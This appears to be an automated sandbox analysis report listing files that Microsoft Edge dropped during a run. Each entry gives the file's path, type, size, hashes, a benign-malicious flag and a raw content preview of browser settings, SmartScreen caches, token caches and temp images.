Preview:117.0.2045.47

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):0
Entropy (8bit):0.0
Encrypted:false
SSDEEP:
MD5:6E51821612F9FA32AA52C2A69FA06BD4
SHA1:B5B88A4F6E40600ECFE7A66DE3A5BE7CCB1FEFC9
SHA-256:1ED05575B4FD526DB4A6990ACCA81AE1D5FF9EB927274B64A39A349C6B5870D3
SHA-512:3136475343F261AD20A0D89D8C021BCD996FA6F0B8F82E3B14377B76CFD4E7103F937E9F979464632C8E5DE2F34C17E69AF4F2E2BB3EA1C27F7E7DF129E59D3F
Malicious:false
Reputation:unknown
Preview:{"abusive_adblocker_etag":"\"8ABCE35666CBACA121128B98C75E78308AAC1CE803625FAFB4A7AFA722C77CA4\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2d5d4.TMP (copy)

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):0
Entropy (8bit):0.0
Encrypted:false
SSDEEP:
MD5:6E51821612F9FA32AA52C2A69FA06BD4
SHA1:B5B88A4F6E40600ECFE7A66DE3A5BE7CCB1FEFC9
SHA-256:1ED05575B4FD526DB4A6990ACCA81AE1D5FF9EB927274B64A39A349C6B5870D3
SHA-512:3136475343F261AD20A0D89D8C021BCD996FA6F0B8F82E3B14377B76CFD4E7103F937E9F979464632C8E5DE2F34C17E69AF4F2E2BB3EA1C27F7E7DF129E59D3F
Malicious:false
Reputation:unknown
Preview:{"abusive_adblocker_etag":"\"8ABCE35666CBACA121128B98C75E78308AAC1CE803625FAFB4A7AFA722C77CA4\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
Category:dropped
Size (bytes):20480
Entropy (8bit):0.6773696719930975
Encrypted:false
SSDEEP:
MD5:6FFCCB198DC6B17E165460E6E246B03C
SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
Malicious:false
Reputation:unknown
Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):47
Entropy (8bit):4.3818353308528755
Encrypted:false
SSDEEP:
MD5:48324111147DECC23AC222A361873FC5
SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
Malicious:false
Reputation:unknown
Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):35
Entropy (8bit):4.014438730983427
Encrypted:false
SSDEEP:
MD5:BB57A76019EADEDC27F04EB2FB1F1841
SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
Malicious:false
Reputation:unknown
Preview:{"forceServiceDetermination":false}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):81
Entropy (8bit):4.3439888556902035
Encrypted:false
SSDEEP:
MD5:177F4D75F4FEE84EF08C507C3476C0D2
SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
Malicious:false
Reputation:unknown
Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):130439
Entropy (8bit):3.80180718117079
Encrypted:false
SSDEEP:
MD5:EB75CEFFE37E6DF9C171EE8380439EDA
SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
Malicious:false
Reputation:unknown
Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):40
Entropy (8bit):4.346439344671015
Encrypted:false
SSDEEP:
MD5:6A3A60A3F78299444AACAA89710A64B6
SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
Malicious:false
Reputation:unknown
Preview:synchronousLookupUris_638343870221005468

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):57
Entropy (8bit):4.556488479039065
Encrypted:false
SSDEEP:
MD5:3A05EAEA94307F8C57BAC69C3DF64E59
SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
Malicious:false
Reputation:unknown
Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):29
Entropy (8bit):4.030394788231021
Encrypted:false
SSDEEP:
MD5:52E2839549E67CE774547C9F07740500
SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
Malicious:false
Reputation:unknown
Preview:topTraffic_638004170464094982

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):575056
Entropy (8bit):7.999649474060713
Encrypted:true
SSDEEP:
MD5:BE5D1A12C1644421F877787F8E76642D
SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
Malicious:false
Reputation:unknown
Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:raw G3 (Group 3) FAX, byte-padded
Category:dropped
Size (bytes):460992
Entropy (8bit):7.999625908035124
Encrypted:true
SSDEEP:
MD5:E9C502DB957CDB977E7F5745B34C32E6
SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
Malicious:false
Reputation:unknown
Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):9
Entropy (8bit):3.169925001442312
Encrypted:false
SSDEEP:
MD5:B6F7A6B03164D4BF8E3531A5CF721D30
SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
Malicious:false
Reputation:unknown
Preview:uriCache_

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):179
Entropy (8bit):5.009116496918222
Encrypted:false
SSDEEP:
MD5:B98C245599FA10D6C180A311190CA938
SHA1:4635EDD5A0E92F59DBC77F3081F548BDB6EA06CB
SHA-256:1D5A153D0A066E353131F56F60265081151A020BCB15979F9C62D2F05EC46335
SHA-512:AD0A3E05CA9C535A45DA6E0A7E0E1B150062CBF2CE1E923A95551D936395209594B241811BE388F638AF9E10FFE2AB5FDB8C27F38F0923C97BF30BF87BB1B33A
Malicious:false
Reputation:unknown
Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1719481970576075}]}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):86
Entropy (8bit):4.3751917412896075
Encrypted:false
SSDEEP:
MD5:E9E365607374115B92E4ABE4B9628101
SHA1:D5054EA9B22317DCA83801EB3586017BFCC0E2A8
SHA-256:5CD2C4D9F13524923046198C92213691539407E04FA520CDAE9EADE1BAD3D91D
SHA-512:A84D65ED53E43883E5ECB7848FBD48F5305A63E6975E6AF480CF85532879720061106BE54F2A5888EBC3569F7123081A0E6EB48CCB8D7DBA3E1DA1C8A3C50401
Malicious:false
Reputation:unknown
Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":3}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ae8459e3-c7fd-4612-88c9-a03328d44437.tmp

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):50961
Entropy (8bit):6.097532983735295
Encrypted:false
SSDEEP:
MD5:261D525CC2C2686853D4D22BECD4FF7C
SHA1:EB133A6DA26FFB454F3E55134A16DF08C406CFC0
SHA-256:4F0328420E866D1B117AF9E907D3DF474428D6AE035E19A35C84DC686B78434C
SHA-512:C925F47B0A1613A6CF7F03BBD4F7B8E232FB393E73DB3CCCB3AD26DC1AC42323445871B6C70CF6638A03DBBF367BDAC0DF84AAC4FEFDDAA58D5E22B4A1AEDF0B
Malicious:false
Reputation:unknown
Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"0f89bcec-7e65-4bf7-8d59-809b8a423d0d"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1719381171"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMs

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):2278
Entropy (8bit):3.84510945030105
Encrypted:false
SSDEEP:
MD5:BB0DB173CE7AA0CE718519C60906C34C
SHA1:3EFD299F441FC959975CB810B43DC8F2A4AEB0C0
SHA-256:EB9593A153FC8874B9C93D28F2B76D99D08FD0DAF243DA5647BCCFE7AFC8237E
SHA-512:2635B1C66D1C412A7C8C1DFC8026F0BA4564726EFD3098B9E6B56879CF87E5CA07C9E5B4623F4E67B11112DAD0D9601FB37A46559A3860F14E10AE4BE444E1CA
Malicious:false
Reputation:unknown
Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.P.Y.g.d.Z.X.H.2.g.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.1.B.t.+.O.p.

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):4622
Entropy (8bit):3.995941469057664
Encrypted:false
SSDEEP:
MD5:03B6455932ECB9461CF9795A72BB44CC
SHA1:AAA4F7808E8A13B84CBA8A808842F15B29A115D7
SHA-256:4224050D4550D89185E05AEDC3E6D6C4E2EC97746B29C6DA45D2F91BB6E51477
SHA-512:7D64C39982A504E035822966D9E4C6FB91D35AD00BA1B7E220B6BCD60CDCB8570FFB977EED3EA7C2D3BE4C5CBDFE9BF95EEB007C84A084A6D639807E4CB781E8
Malicious:false
Reputation:unknown
Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".X.S.I.L.W.4.3.H.2.g.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.1.B.t.+.O.p.

C:\Users\user\AppData\Local\Temp\72b76ae6-0345-47e7-80b8-f7273c3ea7a9.tmp

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
Category:dropped
Size (bytes):31335
Entropy (8bit):7.694019108205432
Encrypted:false
SSDEEP:
MD5:6B72597205C77D3E40E1A35BEE403801
SHA1:6BECEE055C6E057AF9475B6D651B4EE561D02F20
SHA-256:C899297FBDFC88C1634B1145A087FDB5BE17172FD786C078B299557B22F06DEB
SHA-512:7CB1A98E0C7FBB349D9CB681233A9F4ED22A1C3FAADCDF1BC270B04BD97D3FC41AB6F762B2F5F231281D63D96AC3D243640BA81D5E8CCD9F54486B4F538CA8B4
Malicious:false
Reputation:unknown
Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

C:\Users\user\AppData\Local\Temp\ca6c3320-8cee-47ed-9ed9-5d3a19ab721d.tmp

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):146632
Entropy (8bit):7.871244402441594
Encrypted:false
SSDEEP:
MD5:36E1C81070525C3E447B57305466B645
SHA1:F1ECCB7D9EFBAC50DFBD31BD726CC24CAC0EF89E
SHA-256:EBCB9FDEA7917B1C865E9B9D30D49D9220B5407EBF49D2ED7002A001A59FCB11
SHA-512:640248A6DCBD24C543C7EFC537C36DABDE075FB9999F9E64CB4257A3E9F4F0D89BF92CC692430CA36A947B52B747AA85C6EE9684DFC84A756A1FE0584A21AD1E
Malicious:false
Reputation:unknown
